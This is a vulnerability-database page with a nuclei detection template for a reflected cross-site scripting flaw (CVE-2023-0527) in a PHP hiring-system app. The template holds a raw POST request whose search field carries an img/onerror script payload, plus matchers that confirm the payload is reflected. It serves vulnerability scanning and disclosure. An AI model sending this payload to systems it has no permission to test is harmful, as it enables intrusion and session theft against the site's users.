Lucene search
K

Online Security Guards Hiring System - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Online Security Guards Hiring System - Cross-Site Scripting vulnerability found in PHPGurukul Online Security Guards Hiring System 1.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Online Security Guards Hiring System 1.0 - Reflected XSS Exploit
31 May 202300:00
zdt
ATTACKERKB
CVE-2023-39552
4 Aug 202319:15
attackerkb
Circl
CVE-2023-0527
27 Jan 202314:34
circl
CNNVD
PHPGurukul Online Security Guards Hiring System 跨站脚本漏洞
27 Jan 202300:00
cnnvd
CNNVD
编号撤回
14 Jul 202300:00
cnnvd
CVE
CVE-2023-0527
27 Jan 202310:32
cve
Cvelist
CVE-2023-0527 PHPGurukul Online Security Guards Hiring System search-request.php cross site scripting
27 Jan 202310:32
cvelist
Exploit DB
Online Security Guards Hiring System 1.0 - Reflected XSS
31 May 202300:00
exploitdb
EUVD
EUVD-2023-12572
3 Oct 202520:07
euvd
NVD
CVE-2023-0527
27 Jan 202311:15
nvd
Rows per page
id: CVE-2023-0527

info:
  name: Online Security Guards Hiring System - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the searchdata parameter in search-request.php to steal user session cookies and execute attacks.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://vuldb.com/?ctiid.219596
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0527
    - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
    - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html
    - https://vuldb.com/?id.219596
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0527
    cwe-id: CWE-79
    epss-score: 0.06169
    epss-percentile: 0.9262
    cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: online_security_guards_hiring_system_project
    product: online_security_guards_hiring_system
  tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project,vuln

http:
  - raw:
      - |
        POST /search-request.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        searchdata=<img%20src=x%20onerror=alert(document.domain)>&search=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<img src=x onerror=alert(document.domain)>")'
          - 'contains(body, "Online Security Gauard Hiring System |Search Request")'
        condition: and
# digest: 4a0a004730450220751cad9380673350778c1a2c20e27ac0de1f218b126a9e65f13c2c1b80fdba20022100b5c400dcc9c8a43292fed5be8daaeb686f7daf97fadf84511639a03e456b7cd7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.13.5 - 6.1
CVSS 24
CVSS 33.5
EPSS0.06169
27